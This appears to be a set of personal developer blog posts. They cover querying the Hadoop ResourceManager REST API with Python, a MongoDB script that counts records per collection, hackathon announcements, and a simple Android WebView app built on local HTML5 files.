Querying Apache Hadoop Resource Manager with Python.

I was recently asked to write a script that would monitor the running applications on the Apache Hadoop Resource Manager.

I wandered over to the Apache Hadoop Cluster Application Statistics API. The API lets you query most of the information that you see in the web UI: cluster status, cluster metrics, scheduler information, information about nodes in the cluster, and information about applications on the cluster.
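As a rough map of those categories, here is a minimal sketch of the corresponding endpoint paths under the ResourceManager REST API. It assumes Python 3 (the examples in this post use Python 2), and the helper name `endpoint_url` and the base URL are placeholders for illustration, not part of any library.

```python
# Sketch only: the paths are the ResourceManager REST API cluster endpoints;
# CLUSTER_ENDPOINTS and endpoint_url are hypothetical names for this example.
CLUSTER_ENDPOINTS = {
    "info": "/ws/v1/cluster/info",            # cluster status
    "metrics": "/ws/v1/cluster/metrics",      # cluster metrics
    "scheduler": "/ws/v1/cluster/scheduler",  # scheduler information
    "nodes": "/ws/v1/cluster/nodes",          # nodes in the cluster
    "apps": "/ws/v1/cluster/apps",            # applications on the cluster
}


def endpoint_url(resource_manager, name):
    """Return the full URL for one of the cluster endpoints above."""
    return resource_manager.rstrip("/") + CLUSTER_ENDPOINTS[name]


if __name__ == "__main__":
    # Placeholder host; substitute your own ResourceManager address.
    for name in sorted(CLUSTER_ENDPOINTS):
        print(endpoint_url("http://resourcemanager:8088", name))
```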

I started by querying the cluster info.

import urllib2
import json

resource_manager = 'http://resourcemanager:8088'

info_url = resource_manager+"/ws/v1/cluster/info"

request = urllib2.Request(info_url)

# If you prefer to work with XML, replace json with xml in the Accept header below.
request.add_header('Accept', 'application/json')

response = urllib2.urlopen(request)
data = json.loads(response.read())

print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))

This returns the following:

{
"clusterInfo": {
"haState": "ACTIVE",
"hadoopBuildVersion": "2.6.0-cdh5.7.0 from c00978c67b0d3fe9f3b896b5030741bd40bf541a by jenkins source checksum b2eabfa328e763c88cb14168f9b372",
"hadoopVersion": "2.6.0-cdh5.7.0",
"hadoopVersionBuiltOn": "2016-03-23T18:36Z",
"id": 1478120586043,
"resourceManagerBuildVersion": "2.6.0-cdh5.7.0 from c00978c67b0d3fe9f3b896b5030741bd40bf541a by jenkins source checksum deb0fdfede32bbbb9cfbda6aa7e380",
"resourceManagerVersion": "2.6.0-cdh5.7.0",
"resourceManagerVersionBuiltOn": "2016-03-23T18:43Z",
"rmStateStoreName": "org.apache.hadoop.yarn.server.resourcemanager.recovery.NullRMStateStore",
"startedOn": 1478120586043,
"state": "STARTED"
}
}

Now on to what I needed to do: querying the Resource Manager about running applications. The Cluster Applications API lets you retrieve a collection of resources, each of which represents an application. There are multiple parameters that can be specified to narrow down the data returned. For a list of parameters, see the Cluster Applications API documentation.
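To illustrate how those parameters combine, here is a minimal sketch that builds an apps URL from keyword arguments. It assumes Python 3; `apps_url` is a hypothetical helper, and `states`, `user`, and `limit` are used only as examples of the query parameters the API documents.

```python
from urllib.parse import urlencode


def apps_url(resource_manager, **params):
    """Build a Cluster Applications API URL with optional query parameters.

    Hypothetical helper: parameters set to None are skipped, and the rest
    are sorted by name so the resulting URL is stable.
    """
    query = urlencode(sorted(
        (key, value) for key, value in params.items() if value is not None
    ))
    url = resource_manager.rstrip("/") + "/ws/v1/cluster/apps"
    return url + "?" + query if query else url


if __name__ == "__main__":
    # Placeholder host and filter values.
    print(apps_url("http://resourcemanager:8088",
                   states="RUNNING", user="hdfs", limit=10))
```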

However, I just needed the information on running applications, which looks something like this.

import urllib2
import json

resource_manager = 'http://resourcemanager:8088'

info_url = resource_manager+"/ws/v1/cluster/apps?states=running"

request = urllib2.Request(info_url)

# If you prefer to work with XML, replace json with xml in the Accept header below.
request.add_header('Accept', 'application/json')

response = urllib2.urlopen(request)
data = json.loads(response.read())

print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))

This returns something like:

{
"apps": {
"app": [
{
"allocatedMB": 24576,
"allocatedVCores": 3,
"amContainerLogs": "http://resourcemanager:8042/node/containerlogs/container_1478120586043_15232_01_000001/hdfs",
"amHostHttpAddress": "resourcemanager:8042",
"applicationTags": "",
"applicationType": "MAPREDUCE",
"clusterId": 1478120586043,
"diagnostics": "",
"elapsedTime": 18009,
"finalStatus": "UNDEFINED",
"finishedTime": 0,
"id": "application_1478120586043_15232",
"logAggregationStatus": "NOT_START",
"memorySeconds": 431865,
"name": "SELECT 1 AS `number_of_records...TIMESTAMP))(Stage-1)",
"numAMContainerPreempted": 0,
"numNonAMContainerPreempted": 0,
"preemptedResourceMB": 0,
"preemptedResourceVCores": 0,
"progress": 54.07485,
"queue": "root.hdfs",
"runningContainers": 3,
"startedTime": 1479156085020,
"state": "RUNNING",
"trackingUI": "ApplicationMaster",
"trackingUrl": "http://resourcemanager:8088/proxy/application_1478120586043_15232/",
"user": "hdfs",
"vcoreSeconds": 51
}
]
}
}
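For the monitoring script itself, a response like the one above can be boiled down to one line per application. The following is a minimal sketch, assuming Python 3 rather than the Python 2 used in this post; `fetch_json` and `summarize_running_apps` are hypothetical names, and the handling of an empty result (an `"apps"` value of null when nothing is running) is an assumption handled defensively rather than something confirmed here.

```python
import json
import urllib.request


def fetch_json(url):
    """Fetch a URL with an Accept: application/json header and parse the body."""
    request = urllib.request.Request(url, headers={"Accept": "application/json"})
    with urllib.request.urlopen(request) as response:
        return json.loads(response.read().decode("utf-8"))


def summarize_running_apps(data):
    """Return one summary line per application in an apps response.

    Assumption: when no applications match, "apps" may be null or the
    "app" list may be missing, so both cases yield an empty list.
    """
    apps = (data.get("apps") or {}).get("app") or []
    lines = []
    for app in apps:
        lines.append("%s %s %s %.1f%% %dMB %dvcores" % (
            app["id"], app["user"], app["queue"],
            app["progress"], app["allocatedMB"], app["allocatedVCores"],
        ))
    return lines
```

Calling `summarize_running_apps(fetch_json(info_url))` with the apps URL from the script above would give the lines to print or log; the fields chosen for the summary are just one possible selection.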

Straightforward and simple to use.

MongoDB Script for counting records in collections in all the databases

Here is a quick script I wrote for a co-worker.

// Run from the mongo shell. host and port point at the instance to inspect.
var host = "localhost";
var port = 27000;
var dbslist = db.adminCommand('listDatabases');

for (var d = 0; d < dbslist.databases.length; d++) {
     // Connect to each database in turn and list its collections.
     var db = connect(host + ":" + port + "/" + dbslist.databases[d].name);
     var collections = db.getCollectionNames();
     for (var i = 0; i < collections.length; i++) {
         var name = collections[i];
         // Skip the internal system.* collections.
         if (name.indexOf('system.') !== 0) {
            print("\t" + dbslist.databases[d].name + "." + name + ' = ' + db[name].count() + ' records');
         }
     }
}

 

2014 AT&T Developer Summit

I will be attending the AT&T Developer Summit in Las Vegas. I will also be taking part in the Summit Hackathon.

“The AT&T Summit Hackathon is the premier hackathon of the year for the AT&T Developer Program. This year will be focused on wearable technologies and participants will be able to choose between a Wearables Track and an AT&T API Track. Finalists from each track will be featured in live fast pitches on stage with our executives during the keynote at the AT&T Developer Summit on January 6th. In addition, competitors will also have the ability to compete in accelerator challenges, details to be announced, which will offer prizes of up to $10,000 for eligible teams.”

SIC:// AT&T Hackathon 2013

Well, since my last blog entry I went to my first Hackathon, the Seattle Interactive Conference / SIC:// AT&T Hackathon. I ended up joining a team with two complete strangers, Joan Jasak and Arunabh Verma, and we ended up presenting at the conference and taking 3rd place. Check out the video: http://vimeo.com/78582527

Something new: writing an Android app in HTML5

I wanted to write an App for my Android Tablet, something easy so I could get a basic understanding of what it would take to write an app. I figured that I could knock something out fairly quickly, but I didn’t know it would be this easy.

I’m a fairly big user of Eclipse, so I installed the Android SDK and off I went.

I created a new Android project and edited main.xml so that it looked like the following.

--- code starts ---

<?xml version="1.0" encoding="utf-8"?>

<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
                     android:layout_width="fill_parent"
                     android:layout_height="fill_parent"
                     android:orientation="vertical">
  <WebView
                     android:layout_width="fill_parent"
                     android:layout_height="fill_parent"
                     android:id="@+id/webView" />
</LinearLayout>

--- code stops ---

I then updated my Java code so that it would use a WebView and open my HTML5 app.

--- code starts ---

package com.rogerhosto.myandroidapp;
import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebView;
public class MyAndroidAppActivity extends Activity {
	/** Called when the activity is first created. */
	@Override
	public void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
		setContentView(R.layout.main);
		WebView webView = (WebView)findViewById(R.id.webView);
		webView.getSettings().setJavaScriptEnabled(true);
		webView.loadUrl("file:///android_asset/www/index.html");
	}
}

--- code stops ---

Then I created a www directory in the existing assets directory and created index.html for all my HTML5 code. That’s it.

Pretty easy.